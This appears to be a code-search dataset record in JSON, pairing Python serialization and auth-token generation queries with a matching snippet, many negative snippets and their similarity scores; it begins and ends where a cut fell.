self.object]\n else:\n self._data = self.to_native(self.object)\n return self._data", "def _serialise(self):\n # TODO (M Foley)\n pass", "def data(self):\n return self.__dict__", "def serialize(obj):\n return pickle.dumps(obj)", "def get_data(self):\n return self.data.to_json()", "def dump(self):\n return {\"data\": self.data, \"encoding\": self.encoding,\n \"type\": self.type_name}", "def dump():\n\t\treturn self.__dict__;", "def getData(self):\n return dict(self._dump_data)", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date' : str(self.date),\n 'owner_id' : self.owner_id,\n }", "def to_dict(self):\n serialized = self._serializer().dump(self)\n return serialized.data", "def dumps(self):\n return dumps(self)", "def serialize(self) -> typing.Any:\n return self._serialize(self.__dict__)", "def dump_object(self):\n if self._conf is None: self.load() # lazy load # noqa: E701\n return deepcopy(self._data)", "def serialize(self):\n return self.record", "def serialize(self):\n return {\n\n\n }", "def serialize(self, obj, for_read=False):\n\n serializer = self.get_serializer()\n return serializer.serialize(obj.to_python(for_read=for_read))", "def dumps(self, data):\n return dumps(data)", "def to_string(self):\n return json.dumps(self.to_json(), cls=ObjectEncoder)", "def __marshallable__(self):\n return dict(self.__dict__)['_data']", "def to_json_string(self) -> None:\n return json.dumps(dataclasses.asdict(self)) + \"\\n\"", "def serialize(self, obj):\n return json.dumps(obj)", "def serialize(self, obj):\n return dill.dumps(obj, 0).decode('latin-1')", "def dump_object(self, value):\n return pickle.dumps(value)", "def serialize(self, data):\n raise NotImplementedError", "def serialize(self):\n\n\t\treturn str(self)", "def serialize(self):\n data = {}\n\n for k, v in self.__dict__.items():\n if not k.startswith('__'):\n data[k] = v\n\n return data", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"detail\": self.detail,\n \"date_on\": self.date_on,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'owner' : self.user.name,\n 'room' : self.room.name,\n 'description' : self.description,\n 'price' : self.price,\n }", "def data(self):\n return self._data", "def serialize(self):\n return {\n 'name' : self.name,\n 'description' : self.description,\n 'id' : self.id,\n 'picture' : self.picture,\n 'catalog_id' : self.catalog_id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'userID': self.userID,\n }", "def serialize(self):\n\t\treturn { 'type': self.type, 'parameters' : self.parameters}", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def json (self):\n\n return jsonpickle.encode(self, unpicklable=False)", "def to_json(self) :\n return jsonpickle.encode(self)", "def dict(self):\n return self.data", "def getData(self):\n return pickle.loads(self._data)", "def to_json_string(self):\n\t\treturn json.dumps(dataclasses.asdict(self), indent=2, sort_keys=True) + \"\\n\"", "def obj_payload(self):\n self._payload_to_obj()\n return self._obj_payload", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'description' : self.description,\n 'is_private' : self.is_private,\n }", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def data(self):\n return self.__data", "def get_raw_data(self):\n return self.__data", "def serialize(self) -> bytes:\n pass", "def serialize(self) -> bytes:\n pass", "def serialized_data(self):\n return {\n 'id': self.id,\n 'start_time': str(self.start_time),\n 'venue_id': self.venue_id,\n 'venue_name': self.venue.name,\n 'venue_image_link': self.venue.image_link,\n 'artist_id': self.artist_id,\n 'artist_name': self.artist.name,\n 'artist_image_link': self.artist.image_link\n }", "def serialized_data(self):\n return {\n 'id': self.id,\n 'city': self.name,\n 'state': self.state_name\n }", "def serialize(self):\r\n return (self.name, self.values)", "def __json_data__(self):\n if schema.is_dense(self.namespace):\n dense_records = dict()\n for field in Observation._fields:\n dense_records[field] = []\n\n for obs in self.data:\n for key, val in six.iteritems(obs._asdict()):\n dense_records[key].append(serialize_obj(val))\n\n return dense_records\n\n else:\n return [serialize_obj(_) for _ in self.data]", "def data(self):\n return self._data_dict", "def serialize(self):\n return {\n 'id' : self.id,\n 'description': self.description,\n 'longitude' : self.longitude,\n 'latitude' : self.latitude,\n 'created_on' : self.created_on,\n 'created_by' : self.created_by,\n 'likes' : self.likes\n }", "def persistence_serialize(self):\n raise NotImplementedError", "def data_object(self) -> any:\r\n\r\n return self.__data_object", "def toJSON(self):\n raise NotImplementedError()", "def serialize(self):\n return {\n 'lapyname': self.lapyname,\n 'speciality': self.speciality,\n 'ram': self.ram,\n 'storage': self.storage,\n 'warrenty': self.warrenty,\n 'price': self.price,\n 'rating': self.rating,\n 'date': self.date,\n 'id': self. id\n }", "def toJson(self):\r\n return self.__dict__", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date_time' : str(self.date_time),\n 'duration' : self.duration,\n 'highlights' : self.highlights,\n 'conference_id' : self.conference_id,\n 'type_of_session_id' : self.type_of_session_id,\n 'speaker_id' : self.speaker_id,\n 'location_id' : self.location_id,\n 'documents' : self.documents \n }", "def dumps(self):\n pass", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self, data):\r\n if data is None:\r\n return None\r\n elif type(data) is dict:\r\n return serializer.Serializer(\r\n self.get_attr_metadata()).serialize(data, self.content_type())\r\n else:\r\n raise Exception(_(\"Unable to serialize object of type = '%s'\") %\r\n type(data))", "def get_data(self):\n return self.data", "def get_data(self):\n return self.data", "def get_data(self):\n return self.data", "def to_dict(self):\n return self._data_dict", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str, \n }", "def dump_payload(self, obj):\n return want_bytes(self.serializer.dumps(obj, **self.serializer_kwargs))", "def serialize(self):\n return {\n 'id' : self.id,\n 'session_id' : self.session_id,\n 'filename' : self.filename,\n 'filetype' : self.filetype\n }", "def serialize(self):\n\n return str(self)", "def serialize(self):\n\t\treturn {\n\t\t\t\"id\": self.id,\n\t\t\t\"name\": self.name\n\t\t}", "def serialize(self):\n\t\treturn {\n\t\t\t\"id\": self.id,\n\t\t\t\"name\": self.name\n\t\t}", "def __repr__(self):\n return str(self.data)", "def serialize(self):\n return {\n 'name' :self.name,\n 'points' :self.pts,\n 'id' :self.id,\n 'league_id':self.league_id,\n 'userID':self.user_id\n }", "def __str__(self):\n return str(self.serialize())", "def serialize(self):\n return{\n # 'date': self.date,\n 'date': self.date,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'date_added': self.date_added,\n }", "def __str__(self):\n return str(self.__data)", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'latitude': self.latitude,\n 'longitude': self.longitude\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'price': self.price,\n }", "def serialize(self):\n return {\n 'did' : self.did,\n 'name' : self.name,\n 'passwd' : self.passwd,\n 'email' : self.email,\n 'phone' : self.phone,\n 'addr_1' : self.addr_1,\n 'addr_2' : self.addr_2,\n 'city' : self.city,\n 'state' : self.state,\n 'zip' : self.zip,\n 'grade' : self.grade,\n }" ]
[ "0.7632179", "0.74436677", "0.7407177", "0.7401359", "0.7355684", "0.73262495", "0.7152773", "0.71378213", "0.7084737", "0.70828056", "0.70691866", "0.7051947", "0.7041008", "0.7032165", "0.7026014", "0.701268", "0.70110273", "0.69258404", "0.6858589", "0.68336546", "0.6828472", "0.68185455", "0.68062055", "0.68031085", "0.67994124", "0.679653", "0.6741318", "0.6733161", "0.6731945", "0.67198414", "0.66938835", "0.6686106", "0.6684824", "0.6676959", "0.6674545", "0.6671486", "0.66694736", "0.6653572", "0.66408724", "0.66364205", "0.6630836", "0.66292626", "0.6628282", "0.66219205", "0.6607731", "0.6607678", "0.6606469", "0.6606469", "0.6602698", "0.66022825", "0.65985507", "0.659214", "0.6589974", "0.6589831", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65884197", "0.65865225", "0.65778846", "0.65778846", "0.6574096", "0.6563724", "0.655406", "0.6552043", "0.65494585", "0.6539902", "0.65161735", "0.6514207", "0.65029526", "0.6500962", "0.650052", "0.6494365", "0.64876986", "0.648665", "0.648665", "0.6473053", "0.64651936", "0.64651936", "0.64651936", "0.6463822", "0.6463595", "0.6456904", "0.6451542", "0.6444815", "0.64439934", "0.64439934", "0.64400166", "0.6438265", "0.6436541", "0.64289725", "0.64266634", "0.6425896", "0.6418006", "0.64160216", "0.6412184" ]
0.0
-1
Generates an auth token for the given user id.
def generateAuthToken(self): try: payload = { 'exp': datetime.utcnow() + timedelta(days=0, minutes=30), 'iat': datetime.utcnow(), 'sub': self.id } return jwt.encode(payload, current_app.config['SECRET_KEY'], algorithm='HS256').decode() except Exception as error: print(error) return error
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def token_generate(self, user_id):\n try:\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=200),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n encoded_token = jwt.encode(\n payload, current_app.config['SECRET_KEY'], algorithm='HS256'\n )\n return encoded_token\n\n except Exception:\n return str(Exception)", "def generate_token(self, user_id):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=10),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n # create the byte string encoded token using payload and SECRET key\n jwt_string = jwt.encode(\n payload,\n SECRET_KEY,\n algorithm='HS256'\n )\n return jwt_string\n except Exception as e:\n # return an error in string format if an exception occurs\n return str(e)", "def generate_token(user):\n if JWT_AUTH:\n payload = JWT_PAYLOAD_HANDLER(user)\n return JWT_ENCODE_HANDLER(payload)\n else:\n token = Token.objects.create(user=user)\n token.save()\n return token", "def generate_token(user):\n try:\n # generate the auth token\n auth_token = User.encode_auth_token(user.id)\n response_object = {\n \"status\": \"success\",\n \"message\": \"Successfully registered.\",\n \"Authorization\": auth_token.decode(),\n }\n return response_object, 201\n except Exception as e:\n response_object = {\n \"status\": \"fail\",\n \"message\": \"Some error occurred. Please try again.\",\n }\n return response_object, 401", "def generate_token_for_user(user: User, expiration: datetime.timedelta=datetime.timedelta(days=7)):\n\n return generate_token({'id': user.id}, expiration)", "def generate_token(usr):\n token = jwt.encode({\"user\":usr, \"exp\":datetime.datetime.utcnow()\n + datetime.timedelta(minutes=30)}, KEY)\n user = User.update(token=token).where(User.username == usr)\n user.execute()\n return token", "def encode_auth_token(self, user_id):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=0),\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n app.config.get('SECRET_KEY'),\n algorithm='HS256'\n )\n except Exception as e:\n return e", "async def _token(self, user: discord.User = None, user_id: int = None):\n # This is to be used with the registration URL so that it doesn't contain\n # the user's ID in cleartext. This is so that person A cannot trivially\n # generate person B's URL and assign them to person A's team.\n if not user:\n user = self.bot.get_user(user_id)\n hashh = await self.config.user(user).digest()\n if hashh is None:\n salt = await self.config.user(user).secret()\n if salt is None:\n salt = random_salt()\n await self.config.user(user).secret.set(salt)\n hashh = digest(user.id, salt)\n await self.config.user(user).digest.set(hashh)\n await self.config.set_raw('undigest', hashh, value=user.id)\n return hashh", "def encode_auth_token(user_id):\n rfexp = datetime.datetime.utcnow() + datetime.timedelta(days=1, seconds=5)\n exp = int(time.time()+600)\n try:\n payload = {\n 'exp': exp,\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n RFpayload = {\n 'exp': rfexp,\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n ), jwt.encode(\n RFpayload,\n key,\n algorithm='HS512'\n )\n except Exception as e:\n return e", "def generate_access_token(user_id, is_expired=False):\n\n iat = datetime.datetime.utcnow()\n\n return jwt.encode({\n 'sub': user_id, # Subject of this token\n 'iat': iat, # Issued at\n 'exp': iat + datetime.timedelta(hours=1) # Expired at\n if not is_expired\n else iat - datetime.timedelta(minutes=5)\n }, config.SECRET_KEY)", "def fetch_token(self, user_id, password):\n url = buildCommandUrl(self.server, \"/as/user/token\")\n result = json_request(\"POST\", url, {\n \"userId\": user_id,\n \"password\": password\n })\n return result[\"token\"]", "def get_client_token(secret_key, project_id, user):\n sign = hmac.new(six.b(str(secret_key)))\n sign.update(six.b(user))\n sign.update(six.b(str(project_id)))\n token = sign.hexdigest()\n return token", "def generate_new_token(uid):\n random_token = uuid.uuid4()\n token = TokenAuth(user_id=uid, token=random_token)\n token.save()\n return random_token", "def get_auth_token():\n token = g.user.generate_auth_token(24*3600)\n return jsonify({'user_id': g.user.id, 'token': token.decode('ascii')})", "def encode_auth_token(self,user_id): \n try: \n exp = datetime.utcnow() + timedelta(days=1)\n \n payload = {\n 'exp': exp, \n 'iat': datetime.utcnow(), \n 'sub': user_id\n }\n \n encoded_auth_token = jwt.encode(\n payload, \n getattr(settings, \"SECRET_KEY\",\"\"),\n algorithm='HS256'\n )\n return encoded_auth_token\n except Exception as e: \n print_exception(e)\n return e", "def generate_auth_token(self):\n token = Serializer(\n app.config['API_SECRET_KEY'],\n expires_in=app.config['JWT_TOKEN_EXPIRATION']\n )\n return token.dumps({'id': self.id})", "def generate_token(user: dict):\n\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=1),\n 'iat': datetime.datetime.utcnow(),\n 'user': user\n }\n token = jwt.encode(\n payload,\n os.getenv('SECRET_KEY'),\n algorithm='HS256'\n )\n return token.decode('UTF-8')", "def access_token(global_config, existing_user, id_api):\n yield id_api.get_access_token_for_user(existing_user.email, existing_user.password)", "def generate_user(self):\n token = str(uuid.uuid4())\n return self.generate_subid(token=token, return_user=True)", "def generate_token(self):\n self.__get_auth_token_and_secret()\n return self.get_token()", "def GenerateAuthToken(key_name, user_id, action_id='', when=None):\n key = SecretKey.GetSecretKey(key_name)\n when = when or time_util.GetUTCNow()\n when_timestamp = time_util.ConvertToTimestamp(when)\n digester = hmac.new(key)\n digester.update(str(user_id))\n digester.update(_DELIMITER)\n digester.update(action_id)\n digester.update(_DELIMITER)\n digester.update(str(when_timestamp))\n digest = digester.digest()\n\n return base64.urlsafe_b64encode('%s%s%d' % (digest, _DELIMITER,\n when_timestamp))", "def create_token(user):\n payload = {\n 'sub': user.id,\n 'iat': datetime.utcnow(),\n 'exp': datetime.utcnow() + timedelta(days=1)\n }\n token = jwt.encode(payload, config.SECRET_KEY, algorithm='HS256')\n return token.decode('unicode_escape')", "def generate_user_api_key(user):\n now = datetime.datetime.utcnow()\n payload = {\n 'iss': 'minesweeper-api',\n 'aud': 'client',\n 'iat': now,\n 'nbf': now,\n 'exp': now + _get_api_token_exp_from_config(),\n 'user_id': str(user.id),\n 'is_admin': user.is_admin,\n }\n bytestring = jwt.encode(payload, _get_api_key_from_config())\n token = bytestring.decode('utf-8')\n return token", "def _create_auth_token(self, user=None):\n token, created = Token.objects.get_or_create(user=user)\n return token", "def encode_auth_token(secret_key, user_id):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(minutes=60),\n 'iat': datetime.datetime.utcnow(),\n 'sub': user_id\n }\n return jwt.encode(\n payload,\n secret_key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def generate_token(self, user_id, roles, duration=\"2h\"):\n payload = {\"user\": user_id, \"roles\": roles , \"duration\": duration}\n self.headers['X-Rundeck-Auth-Token'] = self.api_token\n self.generate_token_response = requests.post(\n url=\"{}/tokens\".format(self.api),\n json=payload,\n headers=self.headers\n )", "def generate_token_from_user(user, expires_at=None):\n issued_at = datetime.utcnow()\n token = AccessToken()\n token.payload.update(\n {\n \"email\": user.email,\n \"exp\": expires_at or issued_at + timedelta(days=2),\n \"iat\": issued_at,\n \"language\": user.language,\n \"username\": user.username,\n \"full_name\": user.get_full_name(),\n }\n )\n return token", "def generate_auth_token(self, expires_in=600):\n return jwt.encode(\n {'loginid': self.loginid, 'exp': time.time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256')", "def login_user(user_id):\n session_service.get_session_token(user_id)", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n # Generacion del token\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token", "def encode_auth_token(self, id):\n payload = {\n \"exp\": datetime.utcnow()\n + timedelta(\n days=current_app.config.get(\"TOKEN_EXPIRATION_DAYS\"),\n seconds=current_app.config.get(\"TOKEN_EXPIRATION_SECONDS\"),\n ),\n \"iat\": datetime.utcnow(),\n \"sub\": id,\n }\n return jwt.encode(\n payload, current_app.config.get(\"SECRET_KEY\"), algorithm=\"HS256\"\n )", "def generate_auth_token(self, expires_in=600):\n return jwt.encode(\n {'STULOGINID': self.STULOGINID, 'exp': time.time() + expires_in},\n app.config['SECRET_KEY'], algorithm='HS256')", "def create_customer_token(self, _id):\n return self._get(\"/customer/{}/token\".format(_id))", "def get_auth_token_student():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def get_token(self, user):\n\n jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n payload = jwt_payload_handler(user)\n token = jwt_encode_handler(payload)\n return token", "def get_auth_token_teacher():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days= 3)\n payload = {\n 'user': user.username,\n 'exp': int (exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm= 'HS256')\n return token", "def gen_verification_token(user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token.decode()", "def auth_token_generate(identity_param_val, expires_delta=False):\n access_token = ''\n try:\n if expires_delta is not False:\n expires_delta = timedelta(minutes=expires_delta)\n access_token = create_access_token(identity=identity_param_val, expires_delta=expires_delta)\n except Exception as e:\n print(e)\n\n return access_token", "def identity_token_generator(app_key, app_secret, uid=None, role=None):\n return lambda nonce: generate_identity_token(app_key, app_secret, nonce, uid, role)", "def get_token():\n if g.current_user.is_anonymous or g.token_used:\n return unauthorized('Invalid credentials')\n return jsonify({'token': g.current_user.generate_auth_token(\n expiration=3600), 'expiration': 3600})", "def get_token():\n if g.current_user.is_anonymous or g.token_used:\n return unauthorized('Invalid credentials')\n return jsonify({'token': g.current_user.generate_auth_token(\n expiration=3600), 'expiration': 3600})", "def generate_auth_token(self, expiration):\n ser = Serializer(current_app.config['SECRET_KEY'],\n expires_in=expiration)\n return ser.dumps({'id': self.id}).decode('utf-8')", "def create_token(self,uid):\n token_str = self.get_random(5) + str(uid) + str(int(time.time()))\n m = hashlib.md5()\n m.update(token_str)\n return m.hexdigest()", "def _generate_jwt_token(self):\n import jwt\n from datetime import datetime, timedelta\n from django.conf import settings\n\n dt = datetime.now() + timedelta(days=60)\n\n token = jwt.encode({\n 'id': self.pk,\n 'username': self.username,\n 'exp': int(dt.strftime('%s')),\n }, settings.SECRET_KEY, algorithm='HS256')\n # print(token)\n return token", "def generate_identity_token(app_key, app_secret, nonce, uid=None, role=None):\n now = int(time.time())\n tok = {\n 'aak': app_key,\n 'iat': now,\n 'exp': now + 864000,\n 'nce': nonce,\n }\n\n if uid is not None:\n tok['uid'] = uid\n\n if role is not None:\n tok['role'] = role\n\n idt = jwt.encode(tok, app_secret, algorithm='HS256', headers={\n 'typ': 'JWS',\n 'cty': 'frankly-it;v1',\n })\n\n return six.text_type(idt, encoding='utf-8')", "def gen_verification_token(self, user):\n exp_date = timezone.now() + timedelta(days=3)\n payload = {\n 'user': user.username,\n 'exp': int(exp_date.timestamp()),\n 'type': 'email_confirmation'\n }\n token = jwt.encode(payload, settings.SECRET_KEY, algorithm='HS256')\n return token", "def build_access_token_normal_user():\n return do_build_access_token(tenant_id='intility_tenant_id', admin=False)", "def generate_token():\n return uuid4()", "def encode_token(userId):\n token = jwt.encode({'userId': userId, 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=20)},\n secret_key).decode('utf-8')\n return token", "def get_token(id=None, name=None):\n\tif id is None and name is None:\n\t\tname = config['username']\n\treturn get_user(id=id, name=name, get_missing=False).token", "def encode_auth_token(user_id, email):\n try:\n payload = {\n 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=100, seconds=5),\n 'iat': datetime.datetime.utcnow(),\n 'sub': email + ' ' + str(user_id)\n }\n return jwt.encode(\n payload,\n key,\n algorithm='HS256'\n )\n except Exception as e:\n return e", "def create_auth_token(self, create_auth_token_details, user_id, **kwargs):\n resource_path = \"/users/{userId}/authTokens\"\n method = \"POST\"\n\n # Don't accept unknown kwargs\n expected_kwargs = [\n \"retry_strategy\",\n \"opc_retry_token\"\n ]\n extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]\n if extra_kwargs:\n raise ValueError(\n \"create_auth_token got unknown kwargs: {!r}\".format(extra_kwargs))\n\n path_params = {\n \"userId\": user_id\n }\n\n path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}\n\n for (k, v) in six.iteritems(path_params):\n if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):\n raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))\n\n header_params = {\n \"accept\": \"application/json\",\n \"content-type\": \"application/json\",\n \"opc-retry-token\": kwargs.get(\"opc_retry_token\", missing)\n }\n header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}\n\n retry_strategy = self.retry_strategy\n if kwargs.get('retry_strategy'):\n retry_strategy = kwargs.get('retry_strategy')\n\n if retry_strategy:\n if not isinstance(retry_strategy, retry.NoneRetryStrategy):\n self.base_client.add_opc_retry_token_if_needed(header_params)\n return retry_strategy.make_retrying_call(\n self.base_client.call_api,\n resource_path=resource_path,\n method=method,\n path_params=path_params,\n header_params=header_params,\n body=create_auth_token_details,\n response_type=\"AuthToken\")\n else:\n return self.base_client.call_api(\n resource_path=resource_path,\n method=method,\n path_params=path_params,\n header_params=header_params,\n body=create_auth_token_details,\n response_type=\"AuthToken\")", "def get_token(cls, user, full_result=False):\n if user is None:\n return EMPTY_KNOX_TOKEN\n result = AuthToken.objects.create(user=user)\n return result if full_result else result[1]", "def generate(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenGenerate)['token']", "def issue_user_token(user, salt):\r\n\r\n\t\tif user is not None:\r\n\t\t\tif (salt == 'login'):\r\n\t\t\t\ttoken, _ = Token.objects.get_or_create(user=user)\r\n\t\t\telse:\r\n\t\t\t\ttoken = signing.dumps({'pk': user.pk}, salt=salt)\r\n\r\n\t\t\treturn token\r\n\r\n\t\treturn None", "def make_token(self, user):\n return super()._make_token_with_timestamp(user, int(time.time()))", "def get_user_access_token(self, user_id, give_json=False):\n url = Constants.BASE_URL + 'domains/users/accesstokens'\n response = requests.get(url=url,\n params={'key': self.api_key, 'domain_api_secret': self.api_secret, 'user_id': user_id})\n json_obj = response.json()\n self.user_access_token = json_obj[\"result\"][\"user_access_token\"]\n if give_json:\n return json_obj\n else:\n return response.text", "def UserToken(self) -> object:", "def generate_new_token(self):\n self.access_token = random_auth_key()", "def get_auth_token(self, fb_auth_token, fb_user_id):\n\n endpoint = '/auth'\n params = {\n 'facebook_token': fb_auth_token,\n 'facebook_id': fb_user_id\n }\n res = self.post_request(endpoint, params)\n x_auth_token = res[\"token\"]\n return x_auth_token", "def generate_access_token(self):\n return gen_api_key(length=self.token_length)", "def grant_token(request):\n\n grant_token_svc = request.find_service(name=\"grant_token\")\n h_user = request.lti_user.h_user\n\n return {\"grant_token\": grant_token_svc.generate_token(h_user)}", "def _generate_jwt_token(self):\n dt = datetime.now() + timedelta(days=60)\n\n token = jwt.encode({\n 'id': self.pk,\n 'exp': int(dt.strftime('%s'))\n }, settings.SECRET_KEY, algorithm='HS256')\n\n return token.decode('utf-8')", "def get_token(self):\n\t\tself.client.post('/api/v1/auth/signup', data=json.dumps(self.signup_user), content_type='application/json')\n\t\tresponse = self.client.post('/api/v1/auth/login', data=json.dumps(self.login_user), content_type='application/json')\n\t\tresp = json.loads(response.data.decode())\n\t\treturn 'Bearer ' + resp['access_token']", "def generate_jwt(self):\n\n # Generate a random token\n random_token = secrets.token_hex(12)\n\n # Update database\n self.user_in_db.update({'token': random_token})\n User.users_db.put(self.user_in_db)\n\n # Create timestamps for the token\n generated = time.time()\n expires = generated + TWO_WEEKS\n\n # Return the generated jwt\n return manage_tokens.encode({\n 'email': self.email,\n 'token': random_token,\n 'generated': generated,\n 'expires': expires,\n })", "def async_token_result(auth_req_id):\n\n # create a new user based on auth request so that each auth request returns a different token\n new_user_params = {\n 'zenkey_sub': auth_req_id,\n 'name': 'Mock User',\n 'phone_number': '+15555555555',\n 'postal_code': '55555',\n 'email': 'mockuser@mock.user',\n 'username': 'mockuser',\n 'password': 'mockuser'\n }\n new_user = UserModel.create_new_user(new_user_params)\n jwt_token = create_jwt(new_user,\n current_app.config['TOKEN_EXPIRATION_TIME'],\n current_app.config['BASE_URL'],\n current_app.config['SECRET_KEY'])\n\n return jsonify({\n 'auth_req_id': auth_req_id,\n 'token': jwt_token,\n 'token_type': 'bearer',\n # we omit the refresh token for brevity in this example codebase\n 'refresh_token': 'omitted',\n 'expires': current_app.config['TOKEN_EXPIRATION_TIME'].total_seconds()\n })", "def create_token(user):\n access_token = create_access_token(user)\n payload = jwt.decode(\n access_token,\n app.config['JWT_SECRET_KEY'],\n algorithms=app.config['JWT_DECODE_ALGORITHMS'])\n data = {\n 'token':access_token,\n 'username': user.username,\n }\n data.update(payload)\n data['exp'] = datetime.fromtimestamp(data['exp'])\n app.logger.debug(str(data))\n if app.config.get('KEEP_TOKEN'):\n # deletes old tokens\n tokens = app.data.driver.db[config.DOMAIN['token']['datasource']['source']]\n tokens.delete_many({'username': user.username})\n # insets new token\n result = app.data.insert('token', data)\n return access_token, str(result[0])\n\n return access_token, None", "def _get_token(self):\n return user.get_token()", "def get_token(self, obj):\n\n user = User.objects.get(email=obj.email)\n\n payload = jwt_payload_handler(user)\n\n if api_settings.JWT_ALLOW_REFRESH:\n payload['orig_iat'] = timegm(\n datetime.utcnow().utctimetuple()\n )\n\n token = jwt_encode_handler(payload)\n\n return token", "def generate_token(user, expire_time=86400):\n session = Session()\n token = session.query(PasswordRecoveryToken)\\\n .filter(PasswordRecoveryToken.user_id == user.user_id)\\\n .first()\n\n if token is not None:\n self.expire(token)\n \n token = PasswordRecoveryToken()\n token.user_id = user.user_id\n session.add(token)\n \n token.expiration = datetime.now() + timedelta(seconds=expire_time)\n \n sha_token = hashlib.sha224(user.login)\n sha_token.update(user.password)\n sha_token.update(str(token.expiration))\n \n token.token = sha_token.hexdigest()\n print token.token\n return token", "def generate_authentication_code(user):\n\n salt = 'd9!1l@39#c3'\n\n expire_timestamp = time.time() + EXPIRE_TIME_LIMIT\n # Make a string which depends on restaurant id\n # Same encoding mechanism will be used in seerpod hardware\n\n composite_string = \"%s%s%s\" % (user.id, user.password, salt)\n\n str_hex = hashlib.md5(composite_string).hexdigest()\n decoded_str = str(user.owner_email_id) + str(user.id) + \"_\" + str(expire_timestamp) + \"_\" + str_hex\n\n # Encoded string will be a multiple line string, if it is greater\n # than maximum bin size of 76. Browser strips the newline character\n # in the url.\n encoded = base64.encodestring(decoded_str).strip().replace('\\n', '')\n return encoded", "def build_token_with_uid(app_id, app_certificate, channel_name, uid, role, token_expire, privilege_expire=0):\n return RtcTokenBuilder.build_token_with_user_account(app_id, app_certificate, channel_name, uid, role,\n token_expire, privilege_expire)", "def generate_auth_token(self):\n s = Serializer(app.config['SECRET_KEY'])\n return s.dumps({'email': self.email})", "def _create_user(userid, **kw):\n\n new_user = User(userid, **kw)\n USERS[new_user.token] = new_user\n return USERS[new_user.token]", "def create_token(request, user):\n\n key = get_random_string(100)\n data = {}\n ip = get_client_ip_address(request)\n\n return Token.objects.create(user=user, key=key, data=json.dumps(data), ip=ip)", "def generate_token(exp=None):\n\n secret_key = getenv('JWT_SECRET_KEY')\n user = {\n 'first_name': fake.name(),\n 'last_name': fake.name(),\n 'email': fake.email(),\n 'is_admin': IsAdmin.yes,\n 'password': fake.password()\n }\n\n payload = {'id': str(User.find_or_create(user, email=user['email']).id)}\n payload.__setitem__('exp', exp) if exp is not None else ''\n token = jwt.encode(payload, secret_key, algorithm='HS256').decode(CHARSET)\n return 'Bearer {0}'.format(token)", "def generate_token(self):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(days=100),\n 'iat': datetime.utcnow(),\n 'sub': self.id\n }\n # create the byte string token using the payload and the SECRET key\n jwt_bytes = jwt.encode(\n payload,\n os.environ.get('SECRET', 'test'),\n algorithm='HS256'\n )\n return jwt_bytes.decode('utf-8')\n except Exception as e:\n # return an error in string format if an exception occurs\n raise Exception(str(e))", "def gettoken(tool_id, user_id):\n oauth_tokens = {\n 'access_token': '',\n 'user': {\n 'id': user_id\n }\n }\n params = {\n 'user_id': user_id\n }\n tokenq = \"\"\"select\naccess_token, refresh_token, expires_at, token_type, expires_in, user_name\nfrom tokens\nwhere user_id = :user_id\norder by expires_at desc\n\"\"\"\n tconn = 